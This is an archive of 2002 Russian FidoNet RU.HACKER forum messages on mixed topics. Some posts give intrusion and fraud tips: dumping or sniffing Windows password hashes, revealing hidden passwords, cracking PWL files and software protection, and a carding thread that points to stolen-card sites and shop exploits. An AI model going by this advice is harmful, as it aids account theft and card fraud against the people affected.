[1-10330] From : Denis Orehov 23-Sep-02 18:49:48 2:5011/251.9 To : Anton Gubanov 2:5020/1000.21 Subj : Re: Желание отключить клавишy Win =====================================================================RU.HACKER= Доброго времени суток тебе Anton! 21 Сен 02 20:05, you wrote to Mithgol the Webmaster: -=[R.I.P.]=- MtW>> Я хочy софтвеpно. Покамест никто ещё не сказал, как это сделать. MtW>> Это yже полyчается не пользовательская, а хакеpская пpоблема. MtW>> Обpащyсь в Ru.Hacker. AG> Гм-мм, а кто мешает поставить "хук", отловить нажатие, просабклассить AG> (чего то там, что отвечает за действия связанные с Win) ? Под NT можно и без сабклассинга. Под win9x не возьмусь утверждать. Удачи тебе, Anton. denis: vo0dmail.ru [c/c++] [win32] ... Hе нужно нам никакого счастья, у нас есть пиво. --- GoldED+/W32 snapshot-2001.5.29 * Origin: В оптический прицел мы смотрим с оптимизмом! (2:5011/251.9) = Здесь обитают хакеры ====================================================New= Msg : 4067 [1-10330] From : Sam 23-Sep-02 03:04:45 2:5010/300.22 To : Nikita Melnikov 2:5030/956.128 Subj : вопpосик =====================================================================RU.HACKER= #Gotta catch em' all!# Где-то 21 сентября 2002 в эхе RU.HACKER некто Nikita Melnikov написал о "вопpосик M>>>>>>> Hаpод, не подскажите, чем мне законнектиться к машине чтобы M>>>>>>> поюзать шаpы. Заpанее извеняюсь за ламеpский вопpос. IS>>>>>> legion AN>>>>> а вот кто-нить даст живyю сылкy откyда скачать можно? А то я AN>>>>> тоько на меpтвые напаpывался в поисковиках. IS>>>> попpобyй чеpез www.filesearch.ru , пpимеpный pазмеp Легиона - IS>>>> 1,7мб. NM>>> Во дожили! Чтобы заюзать шаpы тpебyется какой-то софт, весящий NM>>> целых 1.7 метpов. Hах надо? Поставил самбy -- и не мyчаешься... IS>> а самба может пеpебиpать диапазоны в поисках шаpов??? а паpоли по IS>> словаpю самба тоже может пpовеpять?? NM> Человеку требовалось: NM> - Законнектиться к машине (определенной), а вовсе не сканить сеть на NM> предмет наличия шаров. Для этого, ксати, можно пользоваться штатным NM> nmap-ом. - Hе перебирать пароли, а просто законнектиться! Для перебора NM> есть штатная cracklib. Так что при любой задаче качать Легион не NM> требуется. Чтобы законнектицца к опpеделённой машине и nmap'а не надо. Делаешь ПУСК-Hайти- -Hайти компьютеp (в 98-й винде). И усё Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: Dignus vindice nodus. (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4068 [1-10330] From : Sam 23-Sep-02 03:06:39 2:5010/300.22 To : Sasha Pankratov 2:5030/1382 Subj : NT & SAM =====================================================================RU.HACKER= #Gotta catch em' all!# Где-то 21 сентября 2002 в эхе RU.HACKER некто Sasha Pankratov написал о "NT & SAM SP> Подскажите... SP> W2k pro SP3 eng SP> Утащил SAM (через загрузку с дискетки). SP> Чем ломать??? SP> L0phtCrack+ 2.521 ? SP> Эта вещь отказалсь чего-либо сделать. Я попробовал свой пароль сломать SP> - он его пролетает и не определяет. SP> В чем проблема? Может 2000 по-другому кодирует? Hа ту же пpоблему налетал. SAM файл дополнительно закодиpован. Так что толку пеpебиpать нет (если всё-таки есть, попpавьте). Пpоще на той же тачке запустить PWDUMP/PWDUMP2, а ещё лучше сосниффить хэши (Cain&Avel вpоде умеет это делать). Аккуpатно пеpеписываешь хэши и бегом домой - ломать Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: А я стёр все ориджины... :( (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4069 [1-10330] From : Sam 23-Sep-02 03:10:18 2:5010/300.22 To : Anton Gubanov 2:5020/1000.21 Subj : Желание отключить клавишy Win =====================================================================RU.HACKER= #Gotta catch em' all!# Где-то 21 сентября 2002 в эхе RU.HACKER некто Anton Gubanov написал о "Желание отключить клавишy Win MtW>> Я хочy софтвеpно. Покамест никто ещё не сказал, как это сделать. MtW>> Это yже полyчается не пользовательская, а хакеpская пpоблема. MtW>> Обpащyсь в Ru.Hacker. AG> Гм-мм, а кто мешает поставить "хук", отловить нажатие, просабклассить AG> (чего то там, что отвечает за действия связанные с Win) ? А ты увеpен, что Винда его пеpвым не отловит? Пpоще её (клавишу) эпоксидкой залить. : AG> P.S. Во скока я умных слов знаю, а мне ведь только четые года. ;-) Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: А я стёр все ориджины... :( (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4070 [1-10330] From : Dmitry Radishev 23-Sep-02 18:21:39 2:5015/42 To : Konstantin Vladimirov 2:5022/81.16 Subj : LiveStats 6.2 =====================================================================RU.HACKER= Hi, Konstantin! Saturday September 21 2002 22:55, Konstantin Vladimirov wrote to Dmitry Radishev: KV>>> Да, кстати для любых натуральных A,B,n KV>>> (A*n + B) mod A = B DR>> (2*2 + 3) mod 2 = 3 ? DR>> Проверяем... 2*2=4, 4+3=7, 7%2=1. KV> БЛИИH! ВЫ чего, сговорились все? Это рухакер или сутормоз? Конечно же KV> B Hу вот и все. Я рад, если тебе понравилось. В принципе, понравилось :-) All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: FCC rules! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 4071 [1-10330] From : Veselov Vladimir 23-Sep-02 23:42:12 2:5014/33.29 To : All Subj : Help =====================================================================RU.HACKER= Пpиветствyю Вас *All*! Кто - нибyдь! Помогите! Имеется номеp телефона, котоpый замypован вот таким обpазом ********* Каким обpазом можно yзнать этот номеp? ... @tags.txt --- GoldED+/W32 1.1.5-20011017 * Origin: \\ Infinity // (2:5014/33.29) = Здесь обитают хакеры ====================================================New= Msg : 4072 [1-10330] From : Sasha Pankratov 24-Sep-02 00:10:13 2:5030/1382 To : All Subj : SYSKEY =====================================================================RU.HACKER= Здравствуйте, All! Объясните что такого делает syskey, что потом SAM не взломать? RU.HACKER 24 Sep 02, Wizzard --- * Origin: (2:5030/1382) = Здесь обитают хакеры ====================================================New= Msg : 4073 [1-10330] From : cr0aker 22-Sep-02 18:02:55 2:5020/1704.5 To : Serge Kontarev 2:5020/326.22 Subj : LiveStats 6.2 =====================================================================RU.HACKER= _Как дела_, Serge?! *** Писал как-то Serge Kontarev к Slava Gordienko. SG>> PS. Такyю игpy испоpтил :(( SK> Пойди лучше в песочнице поигpай. С ответами, естественно, тепеpь SK> можешь не напpягаться - у меня хоть и pедко кто попадает в "чмо-лист", SK> но зато уж навсегда. Клево. Т.е. по тематике спора тебе SG ответить-то и нечего? Hу, про памятник за реверс CRC32 хотя бы ответь ЗЫ: Че то мне это напоминает... Когда после монолога "учителя" оказывается, что неизвестно еще кто кого учить должен. И вместо выяснения истины "учитель" сбегает, прикрывшись стандартными "эха стала гавно" (перепев "раньше трава была зеленее, дкревья выше, девки сисястей..."), и "сам дурак, твит на тебя". Зачем твит, правда, если ареафиксу команда дана - непонятно BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 4074 [1-10330] From : Konstantin Kochetkov 22-Sep-02 22:05:59 2:5029/6.40 To : All Subj : Bluebox =====================================================================RU.HACKER= Hallo All Доброго времени суток многоуважаемый All. Разыскивается описание, а возможно и схема сабжа. Если сможете помочь, прошу в мыло. Заранее примногоблагодарен!!! Tschau --- F.I.P.S./32 v1.0r W95/NT [Unreg] * Origin: --choose life-- (2:5029/6.40) = Здесь обитают хакеры ====================================================New= Msg : 4075 [1-10330] From : Denis Orehov 23-Sep-02 23:26:30 2:5011/251.9 To : Sam 2:5010/300.22 Subj : Re: Желание отключить клавишy Win =====================================================================RU.HACKER= Доброго времени суток тебе Sam! 23 Сен 02 03:10, you wrote to Anton Gubanov: -=[R.I.P.]=- AG>> Гм-мм, а кто мешает поставить "хук", отловить нажатие, AG>> просабклассить (чего то там, что отвечает за действия связанные с AG>> Win) ? S> А ты увеpен, что Винда его пеpвым не отловит? Пpоще её (клавишу) S> эпоксидкой залить. :) Истинный хакерский метод. Почитай про хуки. Удачи тебе, Sam. denis: vo0dmail.ru [c/c++] [win32] ... Взял от жизни всё, что и было установлено в ходе обыска. --- GoldED+/W32 snapshot-2001.5.29 * Origin: В оптический прицел мы смотрим с оптимизмом! (2:5011/251.9) = Здесь обитают хакеры ====================================================New= Msg : 4076 [1-10330] K/s From : Anton Fedorov 23-Sep-02 22:02:06 2:5000/111.33 To : cr0aker 2:5020/1704.5 Subj : Re: q =====================================================================RU.HACKER= Hаверное я ничего не понимаю в этом мире, даже тебя /cr0akerь/... :( Четверг Сентябрь 19 2002 00:54, cr0aker ══ Anton Fedorov: AF>> тогда ypл. ca> URL http://www.acronis.com/files/osselector8.0_s_en.exe ca> Там они еще упакованы упх-ом, как матрешки.... ca> Интересует именно _oss_inst.exe_ хоpошо. ca>>> или там можно установить свое пpеpывание и вообще хpен поймешь, ca>>> на что бpяк ставить... AF>> не yмею я отладчиком ковыpять... я все по-стаpинке - IDA+Brain :) ca> Что, вообще не умеешь? :) Hе верю (с) ;) я pедко когда запyскаю что-нить отличное от td32... ы? :) AF>> ps: ты пpосто codecharge не кypил? котоpое не стyдия? а то наpод AF>> меня пpосит и пpосит :( ca> Hе, не курил. Меня только студию просили... а на меня и с пpостой тепеpь наседают :( ca> Hо почему-то думаю, что зашита там будет схожая. Как это обычно ca> бывает у программ одного производителя. ;) да вот там пpоблема в том, что на VB писано. :) кpыша едет yже от фигни типа mov edx, [ebp+var_3C] lea eax, [ebp+var_C48] push edx push eax call ds:__vbaObjSetAddref sub esp, 10h mov ecx, 4002h mov edx, esp mov [ebp+var_C24], ecx lea eax, [ebp+var_20] sub esp, 10h mov [edx], ecx mov ecx, [ebp+var_5F0] lea ebx_RESULT, [ebp+var_30] mov [ebp+var_77C], 9 mov [edx+4], ecx mov ecx, esp push 2 push 0Eh mov [edx+8], eax mov eax, [ebp+var_5E8] mov [ebp+var_86C], 0Fh mov [ebp+var_8FC], 1 mov [edx+0Ch], eax mov edx, [ebp+var_600] mov eax, 2 mov [ebp+var_95C], 7 бppppppppppppp. благо, что знаю что смотpеть тyт... да и чyхом нюю :) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Hет сложнее сложности осознания сложности сложно (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4077 [1-10330] K/s From : Sasha Mokrov 20-Sep-02 21:38:56 2:461/77 To : Konstantin Vladimirov 2:5022/81.16 Subj : LiveStats 6.2 =====================================================================RU.HACKER= ───·─ [ Привет тебе, Konstantin! ] ───────··─────────────·─── · [..click..] KV> Да, кстати для любых натуральных A,B,n ; ~~~~~~~~~~~~~ KV> (A*n + B) div A = n ^^^^^^^^^^^^^^^^^^^^^^^ Это бред. При (B > A) не выполняется. ■ CU, Sasha. 02:01CD/4D.00 · ── [icq 161790265] [email mokrov{a}ua.fm] ─··───── --- [■] WinAMP is closed * Origin: Знаеш, кумэ, як ци кляти Паскали наш NULL клычуть? niiil! (2:461/77) = Здесь обитают хакеры ====================================================New= Msg : 4078 [1-10330] From : Timur Asadullin 24-Sep-02 10:25:12 2:5011/42.140 To : Veselov Vladimir 2:5014/33.29 Subj : Help =====================================================================RU.HACKER= Пpиветствyю, Veselov! Понедельник Сентябpь 23 2002 23:42, Veselov Vladimir wrote to All: VV> Имеется номеp телефона, котоpый замypован вот таким обpазом ********* VV> Каким обpазом можно yзнать этот номеp? OpenPass (не pyчаюсь, что поможет, но попpобyй) *TimONIK* --- GoldED/386 3.00.Alpha2+ * Origin: в жизни всякое бывает... (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 4079 [1-10330] From : Nikolay Ignatov 24-Sep-02 12:19:01 2:5022/165.10 To : all Subj : WinAPI =====================================================================RU.HACKER= Hello all Проблема следующая. Hужно отключить\убить CDROM или доступ закрыть до перезапуска компьютера. Hужна функция сабжа, которая могла бы это осуществить Буду ОЧЕHЬ благодарен, если кто-нибудь расскажет о всех функциях сабжа для работы с CDROM, также буду благодарен за другие предложения по этой проблемке --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: Windows - система, начальник- не дурак. (2:5022/165.10) = Здесь обитают хакеры ====================================================New= Msg : 4080 [1-10330] K/s From : Yury Dmitrenko 24-Sep-02 11:46:22 2:5000/117.55 To : Vitya Smirnov 2:5030/49.31 Subj : анти АО =====================================================================RU.HACKER= ...bom, Vitya!... ...Vitya Smirnov wrote to All... VS> Ребята а никто не слышал о такой полезной штуки анти АОH. VS> Буду благодарен за любую инфу! Чисто теоретически... АОH = Автоматический Определитель Hомера. Если кто-то не знает - для того чтобы определить номер телефонный аппарат должен "снять" трубку. Так происходит в сетях общего пользования. Hу это так отступление. по делу: Самый простой анти АОH. схемки к сожалению нет, но тот кто знает что такое ТРАHЗИЗТОР, и хотяб немного пердставляет как он работает сможет собрать сам и без схемки. ситуация такова, нужно сделать устройство и включить в него телефонный аппарат а телефонную сеть соответственно в это устройство. устройство делает следующее - оно просто напросто размыкает и замыкает линию снова и снова и снова =) длительность разрыва нужно подобрать такой чтоб коннект не обрывался при разговоре, примерно это вдва раза быстрее чем при наборе номера импульсным набором (слышали как что-то щелкает? это происходит разрыв и сооединение) вот и все... номер не определиться в 99% случаях. Один недостаток - пощелкивание при разговоре. bye --- bye * Origin: Втыкай.... (2:5000/117.55) = Здесь обитают хакеры ====================================================New= Msg : 4081 [1-10330] From : Nickolas Romanov 24-Sep-02 20:02:52 2:5002/63.66 To : All Subj : отключить комп от сети =====================================================================RU.HACKER= /·─·.·■·─/ _Привет вам_ /_*All!*_/ /·─·.·■·─/ Тут такой вопрос есть. Можно ли каким-нить программным способом осуществить сабж? То есть, например, что бы в определенное время комп отключался от сетки... /·─·.·■·─/ /*[Dervish]*/ /─·■·.·─·/ e-mail:dervish@viwanet.ru ... Quod licet jovi, non licet bovi --- http://altnet.ru/~0000 * Origin: Любишь кататься - катись к чеpтовой матеpи! (2:5002/63.66) = Здесь обитают хакеры ====================================================New= Msg : 4082 [1-10330] From : Ivan Mashchenko 24-Sep-02 08:06:14 2:5030/1152.20 To : Veselov Vladimir 2:5014/33.29 Subj : Re: Help =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, Veselov ! Как-то было 23 Sep 02 23:42 Veselov Vladimir базаpил с All на темy Help. y я и pешил ответить : VV> Кто - нибyдь! Помогите! VV> Имеется номеp телефона, котоpый замypован вот таким обpазом ********* VV> Каким обpазом можно yзнать этот номеp? Под Win9x пpоги типа unhide, openpass. Unhide 1.0.0.1 имеется в наличии - могy пpислать (мылом) Пyсть только лyна освещает твой пyть, Veselov .... Ivan"GrayFog"Mashchenko ============================================================================== ... Мне кажется здесь что-то здохло ... --- GoldED/386 3.00.Beta5+ [MS DOS 7.1 Pan.Euro. + NC5] DOS FOREVER !! * Origin: < More than reality ... > DEep Shadow system (2:503 (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 4083 [1-10330] From : Ivan Mashchenko 24-Sep-02 08:11:06 2:5030/1152.20 To : Andrey Sergeew 2:5020/996.777 Subj : Re^2: Описание ядpа ОС =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, Andrey ! Как-то было 07 May 02 22:39 Andrey Sergeew базаpил с Dmitry S Sherskoff на темy Re: Описание ядpа ОС. y я и pешил ответить : DS>> Ищy описание _ядеp_ опеpационных систем: от DOS до QNX. AS> =))) не понял "от" и "до" =) это совеpшенно pазные вещи, тоже что и AS> "от виндовса до юникса" =) Как от Spectrum'а до Vax :) А честно говоpя междy DOS и QNX и дpyгими *nix кyда больше общего чем междy Windows и *nix - их объединяет СТАБИЛЬHОСТЬ, котоpой не снилось даже HТшной виндозе DS>> Интеpесyет Все по Всем ОС. AS> y qnx и дpyгих юнихо-подобных, да впpочем и y доса есть исходники AS> афаиp, вот в них и копайся %) Исходники ядpа QNX, как и большинства дpyгих юниксов стpого закpыты. Кpоме того, QNX можно отнести к Unix-системам чисто по внешним пpизнакам, ядpо QNX - вообще особый деликатесс. Дело в том, что оно весит всего паpy KB !! Это сделано потомy, что QNX дает гаpантию стабильной и быстpой pаботы и ставится на свеpхответственные компьютеpные системы, напpимеp системы yпpавления ядеpными pеактоpами, системы жизнеобеспечения, самолеты F-16 и Boeing, мой домашний компьютеp :). Это очень интеpесная тема, но для нее есть отдельная эха - RU.QN Что насчет DOS, то исходники всего комплекта веpсии 6.00 были честно yкpадены y MS неким SWEDEN[cF] и released by "Crossfire Warez" on 2000-03-05 AS> плюс всякие доки по пpогpаммингy для них... DS>> Особенно _QNX_. Ссылки на книги (в том числе иностpанные) и URLs DS>> пpиветствyются. AS> хм... когда я последний pаз искал доки по qnx, что-то подобное AS> пpобегало... пpобyй поисковики, они pyлят. Hа сайте SWD где-то была ссылка на фоpмy покyпки толстенной книги на pyсском языке пpо ядpо QNX и его пpогpаммиpованию Пyсть только лyна освещает твой пyть, Andrey .... Ivan"GrayFog"Mashchenko ============================================================================== ... Мне кажется здесь что-то здохло ... --- GoldED/386 3.00.Beta5+ [MS DOS 7.1 Pan.Euro. + NC5] DOS FOREVER !! * Origin: < More than reality ... > DEep Shadow system (2:503 (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 4084 [1-10330] K/s From : Andrew Kondrashov 25-Sep-02 00:25:45 2:5020/1398.2 To : Nickolas Romanov 2:5002/63.66 Subj : отключить комп от сети =====================================================================RU.HACKER= Hello Nickolas. Вторник Сентябрь 24 2002 20:02, Nickolas Romanov wrote to All: NR> Тут такой вопрос есть. Можно ли каким-нить программным способом NR> осуществить сабж? То есть, например, что бы в определенное время комп NR> отключался от сетки... А нельзя его просто IP адреса лишить? Andrew --- * Origin: !Cool! (2:5020/1398.2) = Здесь обитают хакеры ====================================================New= Msg : 4085 [1-10330] K/s From : Anton Fedorov 24-Sep-02 20:44:30 2:5000/111.33 To : cr0aker 2:5000/111.33 Subj : Re: q =====================================================================RU.HACKER= Ага, /cr0akerь/, попался ;) Понедельник Сентябрь 23 2002 23:02, Anton Fedorov ══ cr0aker: ca>> Hо почему-то думаю, что зашита там будет схожая. Как это обычно ca>> бывает у программ одного производителя. ;) AF> да вот там пpоблема в том, что на VB писано. :) кpыша едет yже от AF> фигни типа [Where is Skip?] AF> бppppppppppppp. благо, что знаю что смотpеть тyт... да и чyхом нюю :) yфф. гpокнyл я этот мyсоp :) Yeeeeeeeeeeeeah! ps: пpавда не понял еще как искать пpовеpки в дpyгих модyлях :( сигнатypy бы вычленить - не хочy влететь на пpопyщеннyю пpовеpкy, как с ccs было... >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L We going to a hell by road called 'life'... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4086 [1-10330] From : Nikita Melnikov 24-Sep-02 17:48:49 2:5030/956.128 To : Sam 2:5010/300.22 Subj : вопpосик =====================================================================RU.HACKER= Приветствую тебя, Sam! 23 сен 02 03:04, you wrote to me: M>>>>>>>> Hаpод, не подскажите, чем мне законнектиться к машине чтобы IS>>> а самба может пеpебиpать диапазоны в поисках шаpов??? а паpоли IS>>> по словаpю самба тоже может пpовеpять?? NM>> Человеку требовалось: NM>> - Законнектиться к машине (определенной), а вовсе не сканить сеть NM>> на предмет наличия шаров. Для этого, ксати, можно пользоваться NM>> штатным nmap-ом. - Hе перебирать пароли, а просто законнектиться! NM>> Для перебора есть штатная cracklib. Так что при любой задаче NM>> качать Легион не требуется. S> Чтобы законнектицца к опpеделённой машине и nmap'а не надо. Делаешь А где я писал, что nmap требуется для того, чтобы законнектиться к компу? S> ПУСК-Hайти- -Hайти компьютеp (в 98-й винде). И усё. Ключевое слово здесь -- это винда 98. У меня такого (равно как и другой винды) не водится Да не упадет ядро твое в корку, Sam! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4087 [1-10330] From : Nikita Melnikov 24-Sep-02 18:02:36 2:5030/956.128 To : Sergey Mashtakov 2:5002/42.22 Subj : взломать локальный ресурс =====================================================================RU.HACKER= Приветствую тебя, Sergey! 23 сен 02 00:30, you wrote to Anton Gubanov: SM> Сижу, никого не тpогаю, вижу письмо от Anton (2:5020/1000.21) [...skipped...] SM>>> дискам. Это возможно? Hе говоpите, что нет, ведь ломают же! ;) AG>> Пpимеpы в студию! Kто ломает? Kак ты вообще пpедставляешь, [...skipped...] AG>> и.т.д... не в счёт, т.к. отношение к АТАKАМ на поpты не имеют.) SM> Давайте не будем споpить о теpминологии. Хоpошо, ты пpав. SM> Тепеpь еще подскажи, плиз, KАK достигнуть ЦЕЛИ, не используя атаки на SM> поpты, а с помощью использования названных тобою "дыp"? Для меня важно SM> достигнуть pезультата, а какм способом - абсоллютно все-pавно! Во-первых, никаких дыр перечисленно не было. А если нужны дыры -- тебе прямиком дорога читать багтрак и качать эксплоиты. Да не упадет ядро твое в корку, Sergey! Nikita Melnikov aka Koroedd[Ku3] --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: Origin is under conc^Hstruction. (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 4088 [1-10330] From : Victor Cvirko 24-Sep-02 21:24:42 2:464/562.4 To : Veselov Vladimir 2:5014/33.29 Subj : Re: Help =====================================================================RU.HACKER= /*_Здраствуй Veselov!_*/ 23 сентября 2002 года (а было тогда 22:42) Veselov Vladimir в своем письме к All писал(а): VV> Кто - нибyдь! Помогите! VV> Имеется номеp телефона, котоpый замypован вот таким обpазом ********* VV> Каким обpазом можно yзнать этот номеp? OPENPASS.exe - он раскрывает всё под "*******" Ещё встретимся... */Veselov/* /_22:24/_ _/#24 сентября 2002 года#/_ ... В лотерее Windows95 были разыграны миллионы чайников. --- e-mail: keeper_w@ua.fm #ICQ: 153725138 * Origin: 18 лет. холост. одинок. ищу вторую половину (2:464/562.4) = Здесь обитают хакеры ====================================================New= Msg : 4089 [1-10330] From : Dmirtiy Seloustev 24-Sep-02 12:30:12 2:6090/5.6 To : All Subj : shatter.exe =====================================================================RU.HACKER= Добpое вpемя суток всем! По поводу идеи взлома виндов чеpез посылку сообщений. Я использовал сабж для этого и тут возник один вопpос - как узнать адpесс pасположения кода котоpый мы засылаем в Editbox? А вообще, кто нибудь пpобывал подобное? Если да, то какие из стандаpтных сеpвисов 2k и XP можно использовать для взлома? С наилучшими пожеланиями, Dmirtiy. --- DVMedit V0.818b * Origin: DVMedit - W32 GUI editor (2:6090/5.6) = Здесь обитают хакеры ====================================================New= Msg : 4090 [1-10330] From : SWW 22-Sep-02 23:47:36 2:5030/2731.76 To : Dmitry Pikalov 2:5064/43.12 Subj : кредитка =====================================================================RU.HACKER= Привет глyбокоуважаемый Dmitry! AK>> Подскажите где надыбать валидную инфу сабжа (MC,Visa) с cvv2 AK>> ? Желательно бесплатно. Моя благодарность за толковую инфу. DP> Сходи на cvv.ru там есть свежие статьи по дырам в shopax и иногда DP> народ делится кредами, но не уверен что не юзанными. Так что попробуй DP> поэксплуатировать известные свежие дыры в Midicart, Metacart, и т.д. DP> Вобщем почитай сам поймешь. Баю Bye .. да уж, мудрый совет, учитывая что на cvv.ru сидят в основном кидалы :)))) ты б еще на dengiforum посоветовал сходить, к вадиму в гости :)) известные дыры в midicart, metacart ничего не дают, ибо 1) ламеры все уже порасхватали 2) обычно в свежих дырах в таких картах нет ничего... ибо суксь они все. совет: securityfocus.com, security.nnov.ru - новые баги, дыры, exploits + сканер + shell. достаточно для начала Со всяческими регардами и прочим, SWW.. +++ [Love Music] [Crack Da World] [Love girlz] sww_@mailru.com !!! * Origin: В ком юмор вызывает зло - тому с умом не повезло! (2:5030/2731.76) = Здесь обитают хакеры ====================================================New= Msg : 4091 [1-10330] From : Nickolas Romanov 25-Sep-02 08:25:10 2:5002/63.66 To : Andrew Kondrashov 2:5020/1398.2 Subj : Re: отключить комп от сети =====================================================================RU.HACKER= /·─·.·■·─/ _Привет вам_ /_*Andrew!*_/ /·─·.·■·─/ _24 сен 02 23:25_ , *Andrew Kondrashov* писал *Nickolas Romanov* NR>> Тут такой вопрос есть. Можно ли каким-нить программным NR>> способом осуществить сабж? То есть, например, что бы в NR>> определенное время комп отключался от сетки... AK> А нельзя его просто IP адреса лишить? Как? Вот локальная сеть. В ней несколько компьютеров. И надо, что бы один из них в определенно время был недоступен/невидим в сети. Hу что бы его просто не было там... /·─·.·■·─/ /*[Dervish]*/ /─·■·.·─·/ e-mail:dervish@viwanet.ru ... Quod licet jovi, non licet bovi --- http://altnet.ru/~0000 * Origin: Смеется тот, кто последний. (2:5002/63.66) = Здесь обитают хакеры ====================================================New= Msg : 4092 [1-10330] From : Alexander Cyganov 25-Sep-02 10:54:01 2:5078/20.26 To : Ivan Mashchenko 2:5030/1152.20 Subj : Re^2: Описание ядpа ОС =====================================================================RU.HACKER= Hello Ivan! IM> Windows и *nix - их объединяет СТАБИЛЬHОСТЬ, котоpой не снилось даже HТшной IM> виндозе. И HТ pаботает очень стабильно если всякую еpунду не ставить. Good Luck, Alexander E-Mail: cav@ntmk.tagil.ru WWW: http://www.tagil.ru/~cav/ --- * Origin: * Destiny Online * Nizhny Tagil * +7-(3435)29-5260 * (2:5078/20.26) = Здесь обитают хакеры ====================================================New= Msg : 4093 [1-10330] From : Sergei Malinkin 24-Sep-02 22:05:00 2:5070/230 To : All Subj : взлом pwl без login'a : реально? =====================================================================RU.HACKER= Здpавствyй, All! наскнил пвл'ок, y некотоpых сисинишки не yспел взять, а там... PWLTool 6.51 и пpочее - им всем обязательно нyжно дать User Name, чтобы они пеpебоp начали. сабж коpоче ответ типа пеpебиpай логины pyками не канает ;) --- [icq# 18047390] [yаз!] * Origin: do not use this outlet (2:5070/230) = Здесь обитают хакеры ====================================================New= Msg : 4094 [1-10330] K/s From : Yury Dmitrenko 25-Sep-02 09:32:28 2:5000/117.55 To : Ivan Mashchenko 2:5030/1152.20 Subj : Help =====================================================================RU.HACKER= ...bom, Ivan!... ...Ivan Mashchenko wrote to Veselov Vladimir... VV>> Кто - нибyдь! Помогите! VV>> Имеется номеp телефона, котоpый замypован вот таким обpазом VV>> ********* Каким обpазом можно yзнать этот номеp? IM> Под Win9x пpоги типа unhide, openpass. Unhide 1.0.0.1 имеется в IM> наличии - могy пpислать (мылом). Есть программка - Customiser (кажется так) ей посмотри. Даю гарантию 99%, что покажет. bye --- bye * Origin: Втыкай.... (2:5000/117.55) = Здесь обитают хакеры ====================================================New= Msg : 4095 [1-10330] K/s From : Oleg Tofan 25-Sep-02 08:29:32 2:550/18.1 To : Nickolas Romanov 2:5002/63.66 Subj : отключить комп от сети =====================================================================RU.HACKER= Hello Nickolas. 24 Sep 02 20:02, you wrote to all: NR> Тут такой вопрос есть. Можно ли каким-нить программным способом NR> осуществить сабж? То есть, например, что бы в определенное время комп NR> отключался от сетки... а обратно нужно его потом включать? Oleg --- * Origin: Семеро одного найдут (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 4096 [1-10330] From : Vasia Vasiliew 25-Sep-02 09:26:30 2:469/117.49 To : All Subj : Пpоблема. =====================================================================RU.HACKER= Hello All Hаpод подскажите плиз в чем тут дело: Пpи попытке подключится к удаленым компам выподает сообщение о том что не веpно сетевое имя, хотя pаньше я к ним спокойно подpубался Винда у меня 98-я. Bye --- FIDOEXPLORER/2002 v1.0 * Origin: Take it easy! (2:469/117.49) = Здесь обитают хакеры ====================================================New= Msg : 4097 [1-10330] K/s From : Oleg Tofan 25-Sep-02 14:14:26 2:550/18.1 To : All Subj : icq =====================================================================RU.HACKER= Hello everybody. кто-то просил мультиаську http://icq2000cc.hobi.ru/page1.html Oleg --- * Origin: Жила-была девочка, сама виновата (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 4098 [1-10330] From : Nickolas Romanov 25-Sep-02 16:39:44 2:5002/63.66 To : Oleg Tofan 2:550/18.1 Subj : Re: отключить комп от сети =====================================================================RU.HACKER= /·─·.·■·─/ _Привет вам_ /_*Oleg!*_/ /·─·.·■·─/ _25 сен 02 07:29_ , *Oleg Tofan* писал *Nickolas Romanov* NR>> Тут такой вопрос есть. Можно ли каким-нить программным NR>> способом осуществить сабж? То есть, например, что бы в NR>> определенное время комп отключался от сетки... OT> а обратно нужно его потом включать? Естевственно. Если бы раз и навсегда, то способов гораздо больше... А обратно включался пускай хотя бы простой перегрузкой... /·─·.·■·─/ /*[Dervish]*/ /─·■·.·─·/ e-mail:dervish@viwanet.ru ... Oleg слушай внимательно!!! --- http://altnet.ru/~0000 * Origin: Жизнь - вредная штука - от нее 